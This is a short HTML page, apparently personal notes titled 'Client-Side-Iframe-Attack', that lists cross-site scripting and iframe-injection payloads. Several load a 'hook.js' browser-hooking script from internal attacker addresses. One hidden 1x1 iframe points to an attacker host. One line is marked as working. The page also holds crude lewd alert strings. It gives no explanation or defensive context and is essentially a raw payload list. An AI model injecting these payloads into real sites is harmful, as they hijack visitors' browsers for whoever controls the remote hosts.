<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Client-Side-Iframe-Attack</title>
</head><body><br/>
&lt;iframe src="http://172.16.40.5:9999"&gt;&lt;/iframe&gt; &lt;----works<br/>
<br/>
&lt;script src="http://172.16.111.30/hook.js"&gt;&lt;/script&gt;<br/>
<br/>
&lt;iframe src=http://172.16.5.20:8080/fuckyocouch width=1 height=1 style=”visibility:hidden; position:absolute”&gt;&lt;/iframe&gt;<br/>
<br/>
&lt;img src='http://10.100.13.200:80' onerror="alert('XSS');" /&gt;<br/>
<br/>
&lt;script src="http://10.100.13.200:3000/hook.js"&gt;&lt;/script&gt;<br/>
<br/>
&lt;script&gt;alert('I like your boobs')&lt;/script&gt;</body></html>